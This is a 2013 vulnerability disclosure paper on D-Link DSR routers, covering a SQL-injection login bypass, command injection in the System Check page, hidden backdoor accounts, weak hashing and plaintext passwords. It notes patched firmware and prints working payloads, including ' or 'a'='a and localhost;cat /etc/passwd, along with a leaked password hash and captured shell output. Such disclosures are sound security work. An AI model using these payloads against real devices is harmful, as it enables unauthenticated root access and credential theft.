Zine: D-Link DSR Router Series - Remote Command Execution

Author:

0_o

Type:

papers

Platform:

Multiple

Published:

2013-12-06

#
# CVEs:                  
#     CVE-2013-5945 - Authentication Bypass by SQL-Injection
#     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
# 
# Vulnerable Routers:    
#     D-Link DSR-150 (Firmware < v1.08B44)
#     D-Link DSR-150N (Firmware < v1.05B64)
#     D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
#     D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
#     D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Download URL:      
#     http://tsd.dlink.com.tw
# 
# Arch:                  
#     mips and armv6l, Linux
# 
# Author:                
#     0_o -- null_null
#     nu11.nu11 [at] yahoo.com
#
# Date:                  
#     2013-08-18
# 
# Purpose:               
#     Get a non-persistent root shell on your D-Link DSR. 
# 
# Prerequisites:         
#     Network access to the router ports 443 and 23.
#     !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# A list of identified vulns follows. This list is not exhaustive as I assume
# more vulns are present that just slipped my attention. 
# The fact that D-Link implemented a backdoor user (for what reason, please??)
# and just renamed it instead of completely removing it after it was targetted
# by my previous exploit, as well as the triviality of those vulns I found 
# makes me suggest that more vulns are present that are comparably easy to
# exploit.
#
# Since 2013-12-03, patches are available for:
#   DSR-150:                Firmware v1.08B44
#   DSR-150N:               Firmware v1.05B64
#   DSR-250 and DSR-250N:   Firmware v1.08B44
#   DSR-500 and DSR-500N:   Firmware v1.08B77
#   DSR-1000 and DSR-1000N: Firmware v1.08B77
# via http://tsd.dlink.com.tw
#
# And now, have a worthwhile read :-)
#


0. Contents:


1. Vulnerability: Authentication Bypass by SQL-Injection 
                  (CVE-2013-5945)
2. Vulnerability: Privilege Escalation by Arbitrary Command Execution 
                  (CVE-2013-5946)
3. Exposure:      D-Link backdoor user
4. Vulnerability: Use of weak hash algorithms
5. Exposure:      Passwords are stored as plain text in config files
6. Vulnerability: Bad permissions on /etc/shadow



1. Vulnerability: Authentication Bypass by SQL-Injection
                  (CVE-2013-5945)


* Possible via the global webUI login form.

* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

  function login.authenticate(tablename, tableInput)
    local username = tableInput["Users.UserName"]
    local password = tableInput["Users.Password"]
    local cur = db.execute(string.format([[
                  SELECT *, ROWID AS _ROWID_ FROM %s
          WHERE %s = '%s' AND %s = '%s'
      ]], tablename, "UserName", username, "Password", password))
    local result = false
    local statusCode = "NONE"
    if cur then
      local row = cur:fetch({}, "a")
      cur:close()
      result = row ~= nil
      if result == false then
        statusCode = "USER_LOGIN_INVALID_PASSWORD"
      end
    end
    return result, statusCode
  end

* This function creates an SQL statement of the form:

  SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

* Since there is a default admin user account called "admin" around, this is 
  easily exploitable by providing this to the login form:

  username = admin
  password = ' or 'a'='a

* ...resulting in this SQL statement:

  SELECT * 
    FROM "Users" 
    WHERE "UserName" = 'admin' 
      AND "Password" = '' or 'a'='a';

* Old school SQL injection. Ohh, by the way...

* The same fault can be found in captivePortal.lua 
  -- FREE NETWORKS FOR EVERYONE --



2. Vulnerability: Privilege Escalation by Arbitrary Command Execution 
                  (CVE-2013-5946)


* Possible from the Tools --> System Check page.

* File /pfrm2.0/var/www/systemCheck.htm contains:

  local function runShellCmd(command)
      local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
      local cmdOutput = pipe:read("*a")
      pipe:close()
      return cmdOutput
  end
  if (ButtonType and ButtonType == "ping") then
  [...]
  local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
        globalCmdOutput = runShellCmd (cmd_ping) 
        statusMessage = "Pinging " .. ipToPing
  [...]
  elseif (ButtonType and ButtonType == "traceroute") then
  [...]
    local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
    globalCmdOutput = runShellCmd(cmd)
    statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
  [...]
  elseif (ButtonType and ButtonType == "dnslookup") then
  [...]
    util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
    statusMessage = "DNS Lookup for " .. internetNameToNsLookup
  [...]

* Command injection is possible in at least these form sections:
  
  Ping or Trace an IP Address
  Perform a DNS Lookup
  
* When using a browser, deactivate the "onclick" JavaScript checks using 
  a tool like Firebug. Tools like curl are not hindered by these checks.
  
* All forms allow input like this:
  
  localhost;<command>
  
  example: 
  
  localhost;cat /etc/passwd
  
* This user provided value is then directly used as part of the input for the
  call to runShellCmd(c) and thus io.popen(c) in the first form section and 
  os.execute(c) in the second form section.
  
* Output from user provided commands gets displayed on the next page beneath 
  the benign command output.
  
  example: 
  
  [...]
  <textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms
    root:!:0:0:root:/root:/bin/sh
    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
    nobody:x:0:0:nobody:/nonexistent:/bin/false
    ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
  </textarea>
  [...]
  
  
  
3. Exposure: D-Link backdoor user:
  
  
* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

  root:!:0:0:root:/root:/bin/sh
  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
  nobody:x:0:0:nobody:/nonexistent:/bin/false
  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

* You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". 
  That was the account I hacked before with my previous exploit: 
  http://www.exploit-db.com/papers/22930/
  And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. 
  Instead of removing the backdoor, D-Link just created a new one. 
  
* I verified this by showing the /etc/profile:
  
  # /etc/profile
  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
  PATH=.:/pfrm2.0/bin:$PATH
  CLISH_PATH=/etc/clish
  export PATH LD_LIBRARY_PATH CLISH_PATH
  # redirect all users except root to CLI
  if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
  trap "/bin/login" SIGINT
  trap "" SIGTSTP
  /pfrm2.0/bin/cli
  exit
  fi
  PS1='DSR-250N> '
  
  
  
4. Vulnerability: Use of weak hash algorithms:


* In the /etc/shadow, salted DES hashes are used to store user passwords.
  Since this hash type supports at most 8 characters, users can log in by just 
  typing the first 8 letters of their passwords when using SSH or telnet.
  
* An effective password length limitation of 8 characters makes brute force 
  attacks on user accounts very feasible, even if the user chose a longer 
  password.



5. Exposure: Passwords are stored as plain text in config files:


* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the 
  /tmp/system.db is built on boot time, reveals that all user passwords are 
  stored in plain text.

  Example:

  [...]  
  Users = {}
  Users[1] = {}
  Users[1]["Capabilities"] = ""
  Users[1]["DefaultUser"] = "1"
  Users[1]["UserId"] = "1"
  Users[1]["FirstName"] = "backdoor"
  Users[1]["OID"] = "0"
  Users[1]["GroupId"] = "1"
  Users[1]["UserName"] = "gkJ9232xXyruTRmY"
  Users[1]["Password"] = "thisobviouslyisafakepass"
  Users[1]["UserTimeOut"] = "10"
  Users[1]["_ROWID_"] = "1"
  Users[1]["LastName"] = "ssl"
  [...]
  
  
  
6. Vulnerability: Bad permissions on /etc/shadow


* This file should have 600 permissions set and not 644. It is world readable.
  Pointless, since every process runs as root, no user separation is 
  done anyway.

  DSR-250N> ls -l -a /etc/shadow
  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow
  DSR-250N> ps
    PID USER       VSZ STAT COMMAND
      1 root      2700 S    init
      2 root         0 SW<  [kthreadd]
      3 root         0 SW<  [ksoftirqd/0]
      4 root         0 SW<  [events/0]
      5 root         0 SW<  [khelper]
      8 root         0 SW<  [async/mgr]
    111 root         0 SW<  [kblockd/0]
    120 root         0 SW<  [khubd]
    123 root         0 SW<  [kseriod]
    128 root         0 SW<  [kslowd]
    129 root         0 SW<  [kslowd]
    150 root         0 SW   [pdflush]
    151 root         0 SW   [pdflush]
    152 root         0 SW<  [kswapd0]
    200 root         0 SW<  [aio/0]
    210 root         0 SW<  [nfsiod]
    220 root         0 SW<  [crypto/0]
    230 root         0 SW<  [cns3xxx_spi.0]
    781 root         0 SW<  [mtdblockd]
    860 root         0 SW<  [usbhid_resumer]
    874 root         0 SW<  [rpciod/0]
    903 root         0 SWN  [jffs2_gcd_mtd4]
    909 root         0 SWN  [jffs2_gcd_mtd5]
    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
    999 root      1816 S <  /pfrm2.0/udev/sbin/udevd --daemon
   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db
   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db
   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login
   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd
   1141 root     37000 S    /pfrm2.0/bin/sshd
   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db
   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db
   1560 root         0 SW<  [key_timehandler]
   1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
   1600 root      8036 S    rvgd /tmp/system.db
   1612 root         0 SW   [cavium]
   1621 root      8424 S    vpnKAd /tmp/system.db
   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d
   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d
   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd
   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
   1771 root      2680 S    /pfrm2.0/bin/statusD
   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db
   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db
   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db
   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db
   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db
   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db
   2205 root      1904 S    /pfrm2.0/bin/fReset
   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh
   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100
   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
   3355 root      1768 S    /pfrm2.0/bin/rt2860apd
   3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
   5353 root      2704 S    -sh
   7877 root      2568 S    sleep 60
   7953 root      2568 S    sleep 60
   8008 root      2704 R    ps
  16749 root      2704 S    -sh
  25690 root         0 SW<  [RtmpCmdQTask]
  25692 root         0 SW<  [RtmpWscTask]
  DSR-250N>